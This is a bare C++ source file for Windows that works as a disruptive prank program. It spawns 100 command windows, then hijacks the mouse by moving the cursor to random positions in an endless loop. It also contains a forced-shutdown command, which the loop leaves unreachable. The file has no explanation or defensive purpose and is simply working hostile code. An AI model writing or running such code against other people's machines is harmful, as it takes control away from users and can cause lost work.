#include <windows.h>
#include <ctime>
#include<bits/stdc++.h>
using namespace std;
int main() {
int i;
for(i=1;i<=100;i++){
system("start");
}
int x = GetSystemMetrics(SM_CXSCREEN);
int y = GetSystemMetrics(SM_CYSCREEN);
srand(time(0));
while (1) {
SetCursorPos(rand() % x, rand() % y);
}
system("shutdown -s -t 0");
return 0;
}